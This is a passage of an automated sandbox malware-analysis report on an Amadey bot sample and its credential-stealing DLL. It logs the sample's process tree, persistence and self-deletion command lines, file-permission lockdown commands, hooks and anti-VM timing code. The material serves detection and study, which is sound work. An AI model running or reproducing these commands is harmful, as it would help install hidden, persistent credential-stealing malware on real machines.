                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeProcess created: C:\ProgramData\75873290272674793137.exe "C:\ProgramData\75873290272674793137.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\5GPueTFF2S.exe" & exitJump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeProcess created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /FJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&ExitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, MainJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /EJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /EJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUUJump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeFile created: C:\Users\user\AppData\Local\Temp\03bd543fceJump to behavior
                      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@31/16@0/5
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: 5GPueTFF2S.exe, 00000000.00000002.427389587.0000000008C22000.00000004.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.443932645.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: 5GPueTFF2S.exe, 00000000.00000002.427389587.0000000008C22000.00000004.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.443932645.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: 5GPueTFF2S.exe, 00000000.00000002.427389587.0000000008C22000.00000004.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.443932645.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                      Source: 5GPueTFF2S.exe, 00000000.00000002.427389587.0000000008C22000.00000004.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.443932645.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                      Source: 5GPueTFF2S.exe, 00000000.00000002.427389587.0000000008C22000.00000004.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.443932645.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: 5GPueTFF2S.exe, 00000000.00000002.427389587.0000000008C22000.00000004.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.443932645.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: 5GPueTFF2S.exe, 00000000.00000002.427389587.0000000008C22000.00000004.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.443932645.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: 5GPueTFF2S.exe, 00000000.00000002.427389587.0000000008C22000.00000004.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.443932645.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: 5GPueTFF2S.exe, 00000000.00000002.427389587.0000000008C22000.00000004.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.443932645.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: 5GPueTFF2S.exe, 00000000.00000002.427389587.0000000008C22000.00000004.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.443932645.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: 5GPueTFF2S.exe, 00000000.00000002.427389587.0000000008C22000.00000004.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.443932645.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: 42740063057692746811967690.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: 5GPueTFF2S.exe, 00000000.00000002.427389587.0000000008C22000.00000004.00000800.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.443932645.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\118b2709b7d16171ccdcf59ab82ccd18
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2160:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_01
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeMutant created: \Sessions\1\BaseNamedObjects\c33e9ad058e5d380869687d885c0668c
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_01
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCommand line argument: %GR0_2_00EC81D0
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: 5GPueTFF2S.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: 5GPueTFF2S.exeStatic file information: File size 1493440 > 1048576
                      Source: 5GPueTFF2S.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x13c400
                      Source: 5GPueTFF2S.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 5GPueTFF2S.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 5GPueTFF2S.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 5GPueTFF2S.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 5GPueTFF2S.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 5GPueTFF2S.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 5GPueTFF2S.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: 5GPueTFF2S.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 75873290272674793137.exe, 00000001.00000003.430764953.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, 75873290272674793137.exe.0.dr, gntuud.exe.1.dr
                      Source: Binary string: C:\Yafoca\Rij\Kehiquo soja kafex.pdb source: 5GPueTFF2S.exe
                      Source: 5GPueTFF2S.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 5GPueTFF2S.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 5GPueTFF2S.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 5GPueTFF2S.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 5GPueTFF2S.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeUnpacked PE file: 0.2.5GPueTFF2S.exe.60900000.3.unpack
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00ECA499 push ecx; ret 0_2_00ECA4AC
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC7D69 push ebp; iretd 0_2_00EC7D77
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC7D2E push ebp; iretd 0_2_00EC7D50
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: lB@dO\ih
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: Fh?jG[OJ
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: qNR5:WbS
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: z?fd8ijJ
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: CV?7x>JO
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: EVjKc_MI
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: dT<:EHzj
                      Source: 75873290272674793137.exe.0.drStatic PE information: section name: @]topACL
                      Source: nppshell[1].exe.0.drStatic PE information: section name: lB@dO\ih
                      Source: nppshell[1].exe.0.drStatic PE information: section name: Fh?jG[OJ
                      Source: nppshell[1].exe.0.drStatic PE information: section name: qNR5:WbS
                      Source: nppshell[1].exe.0.drStatic PE information: section name: z?fd8ijJ
                      Source: nppshell[1].exe.0.drStatic PE information: section name: CV?7x>JO
                      Source: nppshell[1].exe.0.drStatic PE information: section name: EVjKc_MI
                      Source: nppshell[1].exe.0.drStatic PE information: section name: dT<:EHzj
                      Source: nppshell[1].exe.0.drStatic PE information: section name: @]topACL
                      Source: gntuud.exe.1.drStatic PE information: section name: lB@dO\ih
                      Source: gntuud.exe.1.drStatic PE information: section name: Fh?jG[OJ
                      Source: gntuud.exe.1.drStatic PE information: section name: qNR5:WbS
                      Source: gntuud.exe.1.drStatic PE information: section name: z?fd8ijJ
                      Source: gntuud.exe.1.drStatic PE information: section name: CV?7x>JO
                      Source: gntuud.exe.1.drStatic PE information: section name: EVjKc_MI
                      Source: gntuud.exe.1.drStatic PE information: section name: dT<:EHzj
                      Source: gntuud.exe.1.drStatic PE information: section name: @]topACL
                      Source: cred64[1].dll.7.drStatic PE information: section name: f5g\gWe7
                      Source: cred64[1].dll.7.drStatic PE information: section name: zDthL)*@
                      Source: cred64[1].dll.7.drStatic PE information: section name: nb"h!m#Y
                      Source: cred64[1].dll.7.drStatic PE information: section name: $^+<%+dU
                      Source: cred64[1].dll.7.drStatic PE information: section name: Z-),j99t
                      Source: cred64[1].dll.7.drStatic PE information: section name: 8"ikKHD[
                      Source: cred64[1].dll.7.drStatic PE information: section name: k&l<0?<6
                      Source: cred64[1].dll.7.drStatic PE information: section name: n[uZh3ex
                      Source: cred64[1].dll.7.drStatic PE information: section name: Uh%r6i!H
                      Source: cred64.dll.7.drStatic PE information: section name: f5g\gWe7
                      Source: cred64.dll.7.drStatic PE information: section name: zDthL)*@
                      Source: cred64.dll.7.drStatic PE information: section name: nb"h!m#Y
                      Source: cred64.dll.7.drStatic PE information: section name: $^+<%+dU
                      Source: cred64.dll.7.drStatic PE information: section name: Z-),j99t
                      Source: cred64.dll.7.drStatic PE information: section name: 8"ikKHD[
                      Source: cred64.dll.7.drStatic PE information: section name: k&l<0?<6
                      Source: cred64.dll.7.drStatic PE information: section name: n[uZh3ex
                      Source: cred64.dll.7.drStatic PE information: section name: Uh%r6i!H
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00ECBAFC LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00ECBAFC
                      Source: initial sampleStatic PE information: section where entry point is pointing to: EVjKc_MI
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.993775932964981

                      Persistence and Installation Behavior

                      barindex
                      Yara detected Amadey bot
                      Source: Yara matchFile source: 00000007.00000003.483002099.0000000001165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile created: C:\ProgramData\75873290272674793137.exeJump to dropped file
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\nppshell[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile created: C:\ProgramData\75873290272674793137.exeJump to dropped file
                      Source: C:\ProgramData\75873290272674793137.exeFile created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeFile created: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dllJump to dropped file

                      Boot Survival

                      barindex
                      Creates an undocumented autostart registry key
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                      Source: C:\ProgramData\75873290272674793137.exeMemory written: PID: 6132 base: 640005 value: E9 FB 99 72 77 Jump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeMemory written: PID: 6132 base: 77D69A00 value: E9 0A 66 8D 88 Jump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeMemory written: PID: 6132 base: 7A0007 value: E9 7B 4C 60 77 Jump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeMemory written: PID: 6132 base: 77DA4C80 value: E9 8E B3 9F 88 Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeMemory written: PID: 5292 base: 1030005 value: E9 FB 99 D3 76 Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeMemory written: PID: 5292 base: 77D69A00 value: E9 0A 66 2C 89 Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeMemory written: PID: 5292 base: 1040007 value: E9 7B 4C D6 76 Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeMemory written: PID: 5292 base: 77DA4C80 value: E9 8E B3 29 89 Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeMemory written: PID: 5956 base: 1290005 value: E9 FB 99 AD 76 Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeMemory written: PID: 5956 base: 77D69A00 value: E9 0A 66 52 89 Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeMemory written: PID: 5956 base: 2C40007 value: E9 7B 4C 16 75 Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeMemory written: PID: 5956 base: 77DA4C80 value: E9 8E B3 E9 8A Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: EF0005 value: E9 FB 99 E7 76 Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 77D69A00 value: E9 0A 66 18 89 Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: F00007 value: E9 7B 4C EA 76 Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 77DA4C80 value: E9 8E B3 15 89 Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 32C0005 value: E9 FB BF A7 74 Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 77D3C000 value: E9 0A 40 58 8B Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 32E0008 value: E9 AB E0 A9 74 Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 77D7E0B0 value: E9 60 1F 56 8B Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 58A0005 value: E9 CB 5A D3 71 Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 775D5AD0 value: E9 3A A5 2C 8E Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 58B0005 value: E9 5B B0 D4 71 Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 775FB060 value: E9 AA 4F 2B 8E Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 58C0005 value: E9 DB F8 26 6F Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 74B2F8E0 value: E9 2A 07 D9 90 Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 58D0005 value: E9 FB 42 28 6F Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 74B54300 value: E9 0A BD D7 90 Jump to behavior
                      Overwrites code with function prologues
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 77D3C000 value: 8B FF 55 8B EC Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 775D5AD0 value: 8B FF 55 8B EC Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 775FB060 value: 8B FF 55 8B EC Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 74B2F8E0 value: 8B FF 55 8B EC Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5968 base: 74B54300 value: 8B FF 55 8B EC Jump to behavior
                      Self deletion via cmd or bat file
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeProcess created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\5GPueTFF2S.exe" & exit
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeProcess created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\5GPueTFF2S.exe" & exitJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Tries to evade analysis by execution special instruction (VM detection)
                      Source: C:\ProgramData\75873290272674793137.exeSpecial instruction interceptor: First address: 00000000015B25FE instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeSpecial instruction interceptor: First address: 00000000006E25FE instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                      Tries to detect virtualization through RDTSC time measurements
                      Source: C:\ProgramData\75873290272674793137.exeRDTSC instruction interceptor: First address: 00000000015B25FE second address: 00000000015D33CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007F70A919E801h 0x00000008 call 00007F70A913D081h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007F70A92EFF1Ah 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeRDTSC instruction interceptor: First address: 00000000006E25FE second address: 00000000007033CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007F70A8349041h 0x00000008 call 00007F70A82E78C1h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007F70A849A75Ah 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc
                      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000000559D526 second address: 000000000559D559 instructions: 0x00000000 rdtsc 0x00000002 movsx dx, bh 0x00000006 dec cl 0x00000008 or edx, ecx 0x0000000a bts edx, ecx 0x0000000d xchg dh, dh 0x0000000f not cl 0x00000011 cbw 0x00000013 neg cl 0x00000015 bsf eax, eax 0x00000018 mov eax, 78B605B0h 0x0000001d or ah, FFFFFF9Eh 0x00000020 add cl, FFFFFF94h 0x00000023 xor bl, cl 0x00000025 or dh, dl 0x00000027 push ebp 0x00000028 inc ebp 0x00000029 cdq 0x0000002a cwd 0x0000002c push esi 0x0000002d push ebx 0x0000002e xor bp, di 0x00000031 cwd 0x00000033 rdtsc
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exe TID: 5852Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 4904Thread sleep count: 42 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 5672Thread sleep time: -780000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 5924Thread sleep time: -50000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 4836Thread sleep time: -2520000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 5928Thread sleep time: -1440000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 4836Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 5672Thread sleep time: -30000s >= -30000sJump to behavior
